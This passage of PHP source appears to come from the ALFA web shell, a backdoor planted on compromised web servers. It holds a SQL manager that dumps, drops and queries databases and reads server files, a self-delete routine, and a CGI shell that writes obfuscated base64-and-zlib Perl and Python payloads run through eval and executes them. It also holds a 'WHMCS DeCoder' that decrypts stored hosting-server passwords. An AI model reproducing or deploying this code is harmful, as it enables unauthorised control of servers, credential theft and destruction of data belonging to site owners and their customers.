    echo "\n<div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>" . getConfigHtml('all') . "</p></center>\n<form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>\n<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>\n<input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : 'UTF-8') . "'>\n<td><select name='type'><option value='mysql' ";
    if (@$_POST['type'] == 'mysql') {
        echo "selected";
    }
    echo ">MySql</option><option value='pgsql' ";
    if (@$_POST['type'] == 'pgsql') {
        echo "selected";
    }
    echo ">PostgreSql</option></select></td>\n<td><input type='text' name='sql_host' id='db_host' value='" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "'></td>\n<td><input type='text' name='sql_login' id='db_user' value='" . (empty($_POST['sql_login']) ? '' : htmlspecialchars($_POST['sql_login'])) . "'></td>\n<td><input type='text' name='sql_pass' id='db_pw' value='" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "'></td><td>";
    $tmp = "<input type='text' name='sql_base' id='db_name' value='" . (empty($_POST['sql_base']) ? '' : htmlspecialchars($_POST['sql_base'])) . "'>";
    if (isset($_POST['sql_host'])) {
        if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
            $_SESSION["sql_host"] = $_POST['sql_host'];
            $_SESSION["sql_login"] = $_POST['sql_login'];
            $_SESSION["sql_pass"] = $_POST['sql_pass'];
            $_SESSION["sql_base"] = $_POST['sql_base'];
            switch ($_POST['charset']) {
                case "Windows-1251":
                    $db->setCharset('calfa1251');
                    break;
                case "UTF-8":
                    $db->setCharset('utf8');
                    break;
                case "KOI8-R":
                    $db->setCharset('koi8r');
                    break;
                case "KOI8-U":
                    $db->setCharset('koi8u');
                    break;
                case "calfa866":
                    $db->setCharset('calfa866');
                    break;
            }
            $db->setCharset('utf8');
            $db->listDbs();
            echo "<select name=sql_base><option value=''></option>";
            while ($item = $db->fetch()) {
                list($key, $value) = each($item);
                echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
            }
            echo "</select>";
        } else {
            echo $tmp;
        }
    } else {
        echo $tmp;
    }
    echo "</td>\n<td><input type='submit' value=' '></td>\n<td><input type='checkbox' name='sql_count' value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> <div class=\"txtfont\">count the number of rows</div></td>\n</tr>\n</table>\n<script>mysql_cache['host']='" . addslashes($_POST['sql_host']) . "';mysql_cache['user']='" . addslashes($_POST['sql_login']) . "';mysql_cache['pass']='" . addslashes($_POST['sql_pass']) . "';mysql_cache['db']='" . addslashes($_POST['sql_base']) . "';mysql_cache['charset']='" . addslashes($_POST['charset']) . "';mysql_cache['type']='" . addslashes($_POST['type']) . "';mysql_cache['count']='" . addslashes($_POST['sql_count']) . "'</script>\n";
    if (isset($db) && $db->link) {
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
        if (!empty($_POST['sql_base'])) {
            $db->selectdb($_POST['sql_base']);
            echo "<tr><td width=1 style='border-top:2px solid #666;'><div class='txtfont'>Tables:</div><br><br>";
            $tbls_res = $db->listTables();
            while ($item = $db->fetch($tbls_res)) {
                list($key, $value) = each($item);
                if (!empty($_POST['sql_count'])) {
                    $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM `' . $value . '`'));
                }
                $value = htmlspecialchars($value);
                echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href='javascript:void(0);' onclick=\"fs('0','" . $value . "')\"><span class='mysql_tables' style='font-weight:unset;'>" . $value . "</span></a>" . (empty($_POST['sql_count']) ? '&nbsp;' : " <small><span style='font-weight:unset;' class='mysql_table_count'>({$n['n']})</span></small>") . "</nobr><br>";
            }
            echo "<p><input type='checkbox' onclick='is();'> <input type='button' value=' Dump ' onclick=\"fs('4');\" class='button'> <input type='button' value=' Drop ! ' onclick=\"fs('5');\" class='button'></p><div class='txtfont'>File path:</div><input type='text' id='dumpfile' name='file' value='dump.sql'>" . ($dumpStatus ? '<p><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'dump.sql\', \'download\')"><font color="#0F0">~ Download File ~</font></a></p>' : '') . "</td><td style='border-top:2px solid #666;'>";
            if (@$_POST['alfa1'] == 'select') {
                $_POST['alfa1'] = 'query';
                $_POST['alfa3'] = $_POST['alfa3'] ? $_POST['alfa3'] : 1;
                $db->query('SELECT COUNT(*) as n FROM `' . $_POST['alfa2'] . '`');
                $num = $db->fetch();
                $pages = ceil($num['n'] / 30);
                echo "<span>" . $_POST['alfa2'] . "</span> ({$num['n']} records) Page # <input type=text name='alfa3' value=" . (int) $_POST['alfa3'] . ">";
                echo " of {$pages}";
                if ($_POST['alfa3'] > 1) {
                    echo " <a href='javascript:void(0);' onclick=fs('1','[\"" . $_POST['alfa2'] . "\",\"" . ($_POST['alfa3'] - 1) . "\"]')>&lt; Prev</a>";
                }
                if ($_POST['alfa3'] < $pages) {
                    echo " <a href='javascript:void(0);' onclick=fs('1','[\"" . $_POST['alfa2'] . "\",\"" . ($_POST['alfa3'] + 1) . "\"]')>Next &gt;</a>";
                }
                $_POST['alfa3']--;
                $cache_table = $_POST['alfa2'];
                if ($_POST['type'] == 'pgsql') {
                    $_POST['alfa2'] = 'SELECT * FROM `' . $_POST['alfa2'] . '` LIMIT 30 OFFSET ' . $_POST['alfa3'] * 30;
                } else {
                    $_POST['alfa2'] = 'SELECT * FROM `' . $_POST['alfa2'] . '` LIMIT ' . $_POST['alfa3'] * 30 . ',30';
                }
                echo "<br><br>";
            }
            if (@$_POST['alfa1'] == 'query' && !empty($_POST['alfa2'])) {
                $prikey = $db->fetch($db->query("SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '" . @addslashes($_POST['sql_base']) . "' AND TABLE_NAME = '" . @addslashes($cache_table) . "' AND COLUMN_KEY = 'PRI'"));
                $db->query(@$_POST['alfa2']);
                if ($db->res !== false) {
                    $title = false;
                    echo "<table width=\"100%\" cellspacing=\"1\" cellpadding=\"2\" class=\"main\" style=\"background-color:#292929\" border=\"1\">";
                    $line = 1;
                    while ($item = $db->fetch()) {
                        if (!$title) {
                            echo "<tr><th>#</th>";
                            foreach ($item as $key => $value) {
                                echo '<th>' . $key . '</th>';
                            }
                            reset($item);
                            $title = true;
                            echo "</tr><tr>";
                            $line = 2;
                        }
                        if ($cache_table != '') {
                            $cacheMsg = '<a href="javascript:void(0);" onclick=fs(\'2\',\'["' . $cache_table . '","' . (!$prikey['COLUMN_NAME'] ? 0 : $prikey['COLUMN_NAME']) . '","' . __ZW5jb2Rlcg(json_encode(!$prikey['COLUMN_NAME'] ? $item : $item[$prikey['COLUMN_NAME']])) . '"]\')>Edit</a>';
                        } else {
                            $cacheMsg = '-';
                        }
                        echo '<tr class="l' . $line . '"><td>' . $cacheMsg . '</td>';
                        $line = $line == 1 ? 2 : 1;
                        foreach ($item as $key => $value) {
                            if ($value == null) {
                                echo "<td><i>null</i></td>";
                            } else {
                                echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
                            }
                        }
                        echo "</tr>";
                    }
                    echo "</table>";
                } else {
                    echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
                }
            }
            echo "</form>";
            if (@$_POST['alfa1'] == 'edit' && !empty($_POST['alfa2'])) {
                $data = explode(':', $_POST['alfa3']);
                echo '<p><div class="txtfont">Table:</div> <font color="#0F0">' . $data[0] . '</font></p>';
                echo "<form onsubmit='fsu(this);return false;'><table border='1'>";
                if ($data[1] != '0') {
                    $data[2] = __ZGVjb2Rlcg($data[2]);
                    $data[2] = str_replace('"', '', $data[2]);
                    $fetch = $db->fetch($db->query("SELECT * FROM `" . $data[0] . "` WHERE `" . $data[1] . "` = '" . $data[2] . "'"));
                    $fetch['__ALFAKEY'] = $data[1];
                    $fetch['__ALFAKEYVAL'] = $data[2];
                } else {
                    $d = __ZGVjb2Rlcg($data[2]);
                    $fetch = json_decode($d, true);
                }
                foreach ($fetch as $key => $value) {
                    if ($key == '__ALFAKEY' || $key == '__ALFAKEYVAL') {
                        continue;
                    }
                    $value = htmlspecialchars($value);
                    echo "<tr><td>{$key}</td><td><input name='{$key}' value='{$value}' /></td></tr>";
                }
                echo "</table><input type='hidden' name='__ALFADATA' value='" . __ZW5jb2Rlcg(json_encode($data[1] != '0' ? array('__ALFAKEY' => $data[1], '__ALFAKEYVAL' => $data[2]) : $fetch)) . "'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>";
            }
            if (@$_POST['alfa1'] == 'update' && !empty($_POST['alfa2'])) {
                $data = json_decode($_POST['alfa2'], true);
                $alfadata = $data['__ALFADATA'];
                $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
                $keyval = array();
                echo '<p><div class="txtfont">Table:</div> <font color="#0F0">' . $data['__ALFATBL'] . '</font></p>';
                echo "<form onsubmit='fsu(this);return false;'><table border='1'>";
                $set = '';
                foreach ($data as $key => $value) {
                    if ($key == '__ALFATBL' || $key == '__ALFADATA') {
                        continue;
                    }
                    if ($data2['__ALFAKEY'] == $key) {
                        $keyval['__ALFAKEY'] = $key;
                        $keyval['__ALFAKEYVAL'] = $value;
                    }
                    $set .= "`{$key}` = '" . addslashes($value) . "',";
                    $value = htmlspecialchars($value);
                    echo "<tr><td>{$key}</td><td><input name='{$key}' value='{$value}' /></td></tr>";
                }
                unset($data['__ALFADATA']);
                echo "</table><input type='hidden' name='__ALFADATA' value='" . __ZW5jb2Rlcg(json_encode(isset($data2['__ALFAKEY']) ? array('__ALFAKEY' => $keyval['__ALFAKEY'], '__ALFAKEYVAL' => $keyval['__ALFAKEYVAL']) : $data)) . "'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>";
                if (!isset($data2['__ALFAKEY'])) {
                    $where = '';
                    foreach ($data2 as $key => $value) {
                        if ($key == '__ALFATBL' || $key == '__ALFADATA') {
                            continue;
                        }
                        $value = addslashes($value);
                        $where .= "`{$key}` = '{$value}' AND ";
                    }
                    $where = substr($where, 0, -4);
                } else {
                    $where = "`{$data2['__ALFAKEY']}` = '" . addslashes($data2['__ALFAKEYVAL']) . "'";
                }
                $set = substr($set, 0, -1);
                $db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET {$set} WHERE {$where}"));
                if ($db->error()) {
                    echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
                } else {
                    echo "Success...!";
                }
            }
            if ($_POST['alfa1'] != 'edit' && $_POST['alfa1'] != 'update') {
                echo "<p>Query:</p><form onsubmit='fs(this);return false;'>\n<input type='hidden' name='alfa1' value='query'/>\n<textarea name='query' style='width:100%;height:100px'>";
                echo $_POST['alfa1'] != 'loadfile' ? htmlspecialchars($_POST['alfa2']) : '';
                echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
            }
            echo "</td></tr>";
        }
        echo "</table></form><br/>";
        if ($_POST['type'] == 'mysql') {
            $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
            if ($db->fetch()) {
                echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
            }
        }
        if (@$_POST['alfa1'] == 'loadfile') {
            $file = $db->loadFile($_POST['alfa2']);
            echo '<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
        }
    } else {
        echo htmlspecialchars($db->error());
    }
    echo "</div>";
    alfafooter();
}
function alfaselfrm()
{
    if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'yes') {
        echo __pre() . '<center>';
        if (@unlink($GLOBALS['__file_path'])) {
            echo "<b>Shell has been removed</i> :)</b>";
        } else {
            echo "unlink error!";
        }
        echo "</center>";
    }
    if (isset($_POST['alfa1']) && $_POST['alfa1'] != 'yes') {
        echo "<div class=header>";
        echo "\n<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
        echo "<p><div class=\"txtfont\">Do you want to destroy me?!</div><a href=javascript:void(0) onclick=\"g('selfrm',null,'yes');\"> Yes</a>";
        echo "</p></center></div>";
    }
}
function alfacgishell()
{
    alfahead();
    $div = "";
    if (!in_array($_POST['alfa1'], array('perl', 'py'))) {
        $div = "</div>";
        echo "<div class=header><center><p><div class=\"txtfont_header\">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick=\"runcgi('perl')\">| Perl | </a><a href=javascript:void(0) onclick=\"runcgi('py');\">| Python | </a>";
    }
    if (isset($_POST['alfa1']) && in_array($_POST['alfa1'], array('perl', 'py'))) {
        @mkdir('cgialfa', 0755);
        @chdir('cgialfa');
        alfacgihtaccess('cgi');
        $name = $_POST['alfa1'] . '.alfa';
        $perl = "#!/usr/bin/perl   -I/usr/local/bandmin\nuse MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64(\"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\")));";
        $py = "#!/usr/bin/python\nimport zlib, base64\neval(compile(zlib.decompress(base64.b64decode(\"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\")),'<string>','exec'))";
        if ($_POST['alfa1'] == 'perl') {
            $code = $perl;
        } else {
            $code = $py;
        }
        if (__write_file($name, $code)) {
            @chmod($name, 0755);
            echo '<iframe src="cgialfa/' . $name . '" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
        }
    }
    echo $div;
    alfafooter();
}
function alfaWhmcs()
{
    alfahead();
    echo "<div class=header>";
    function decrypt($string, $cc_encryption_hash)
    {
        $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
        $hash_key = _hash($key);
        $hash_length = strlen($hash_key);
        $string = __ZGVjb2Rlcg($string);
        $tmp_iv = substr($string, 0, $hash_length);
        $string = substr($string, $hash_length, strlen($string) - $hash_length);
        $iv = $out = '';
        $c = 0;
        while ($c < $hash_length) {
            $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
            ++$c;
        }
        $key = $iv;
        $c = 0;
        while ($c < strlen($string)) {
            if ($c != 0 and $c % $hash_length == 0) {
                $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
            }
            $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
            ++$c;
        }
        return $out;
    }
    function _hash($string)
    {
        if (function_exists('sha1')) {
            $hash = sha1($string);
        } else {
            $hash = md5($string);
        }
        $out = '';
        $c = 0;
        while ($c < strlen($hash)) {
            $out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
            $c += 2;
        }
        return $out;
    }
    AlfaNum(8, 9, 10);
    echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>" . getConfigHtml('whmcs') . "</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">\n<input type='hidden' name='form_action' value='2'>";
    $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50'));
    create_table($table);
    echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
    if ($_POST['alfa5'] != '') {
        $db_host = $_POST['alfa7'];
        $db_username = $_POST['alfa3'];
        $db_password = $_POST['alfa4'];
        $db_name = $_POST['alfa5'];
        $cc_encryption_hash = $_POST['alfa6'];
        echo __pre();
        $conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name) or die(mysqli_error($conn));
        $query = mysqli_query($conn, "SELECT * FROM tblservers");
        $num = mysqli_num_rows($query);
        if ($num > 0) {
            for ($i = 0; $i <= $num - 1; $i++) {
                $v = @mysqli_fetch_array($query);
                $ipaddress = $v['ipaddress'];
                $username = $v['username'];
                $type = $v['type'];
                $active = $v['active'];
                $hostname = $v['hostname'];
                echo "<center><table border='1'>";
                $password = decrypt($v['password'], $cc_encryption_hash);
                echo "<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>{$type}</td></tr></b>";
                echo "<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>{$active}</td></tr></b>";
                echo "<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>{$hostname}</td></tr></b>";
                echo "<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>{$ipaddress}</td></tr></b>";
